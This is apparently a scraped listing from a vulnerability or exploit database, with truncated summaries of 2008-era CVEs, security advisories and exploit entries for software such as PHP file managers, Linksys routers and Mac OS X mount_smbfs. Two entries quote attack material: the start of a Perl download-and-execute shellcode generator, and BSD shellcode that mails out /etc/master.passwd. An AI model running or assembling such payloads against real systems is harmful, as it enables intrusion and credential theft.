CVE-2008-2110

Unrestricted file upload vulnerability in qtofm.php in QTOFileManager 1.0 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request...

CVE-2008-1988

Unrestricted file upload vulnerability in the fileupload function in core/misc.class.php in EncapsGallery 2.0.2 allows remote authenticated administrators to upload and execute arbitrary PHP files by uploading a file with an executable extension, then accessing it via a direct request to the file...

Nik Software Sharpener Pro vulnerable to privilege escalation

Overview The Nik Software Shapener Pro installs files with insecure permissions, which may allow a local attacker to elevate privileges. Description Nik Software Sharpener Pro is an Adobe Photoshop plug-in that provides image sharpening capabilities. The Nik Software Sharpener Pro installer sets...

xnview-overflow.txt

-------- XNview -------- Informations : Version : 1.92.1 Website : http://www.xnview.com/ Problem : Long Filename Overflow Description: XnView is an efficient multimedia viewer, browser, and converter. It supports more than 400 graphic file formats PNG, JPEG, TARGA, TIFF, GIF, BMP, and more...

win32 Download and Execute Shellcode Generator (browsers edition)

No description provided by source. !/usr/bin/perl $loadingurl=$ARGV0; chomp $loadingurl; my @buffer; if $loadingurl eq "" $sco = 'ERROR!!! Enter url to remote exe.'; buffergen$sco; print @buffer; exit; $c= generatechar0; $sco= "\xE8\x56\x00\x00\x00\x53\x55\x56\x57\x8B\x6C\x24\x18\x8B\x45"...

CVE-2008-1264

The Linksys WRT54G router has "admin" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file...

CVE-2008-0805

Unrestricted file upload vulnerability in image.php in PHPizabi 0.848b C1 HFP1 allows remote attackers to execute arbitrary code by uploading a file with an executable extension from the event page, then accessing it via a direct request to the file in system/cache/pictures...

Design/Logic Flaw

Geert Moernaut LSrunasE and Supercrypt use an encryption key composed of an SHA1 hash of a fixed string embedded in the executable file, which makes it easier for local users to obtain this key without reverse engineering...

GE Fanuc Proficy Information Portal allows arbitrary file upload and execution

Overview GE Fanuc Proficy Information Portal allows authenticated users to upload arbitrary files. An attacker could upload an executable server-side script e.g., an .asp shell on a Microsoft Internet Information Server platform and execute arbitrary commands with the privileges of the web server...

Debian Security Advisory DSA 637-1 (exim-tls)

The remote host is missing an update to exim-tls announced via advisory DSA 637-1. OpenVAS Vulnerability Test $Id: deb6371.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 637-1 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

Debian Security Advisory DSA 947-2 (clamav)

The remote host is missing an update to clamav announced via advisory DSA 947-2. A heap overflow has been discovered in ClamAV, a virus scanner, which could allow an attacker to execute arbitrary code by sending a carefully crafted UPX-encoded executable to a system runnig ClamAV. In addition,...

Debian Security Advisory DSA 159-2 (python)

The remote host is missing an update to python announced via advisory DSA 159-2. OpenVAS Vulnerability Test $Id: deb1592.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 159-2 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

Debian Security Advisory DSA 193-1 (kdenetwork)

The remote host is missing an update to kdenetwork announced via advisory DSA 193-1. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescripti...

Fedora 7 : qimageblitz-0.0.4-0.3.svn706674.fc7 (2008-0463)

This update fixes qimageblitz not to needlessly require an executable stack. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without...

Novell ZENworks Endpoint Security Management security client privilege escalation

Application launch with SYSTEM privileges by relative path, temporary executable files creatin in user-controlled directory...

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

No description provided by source. / Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179...

bsd/x86 cat /etc/master.passwd | mail [email] 92 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char shellcode=...

applesmb-overflow.txt

/ Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179 http://seclists.org/fulldisclosure/2007/Dec/0445.html...

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

Exploit for macOS platform in category local exploits ============================================================== Apple Mac OS X mountsmbfs Stack Based Buffer Overflow Exploit ============================================================== / Copyright C 2007-2008 Subreption LLC. All rights...

Apple Mac OSX - mount_smbfs Local Stack Buffer Overflow

Apple Mac OSX - mountsmbfs Local Stack Buffer Overflow / Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179...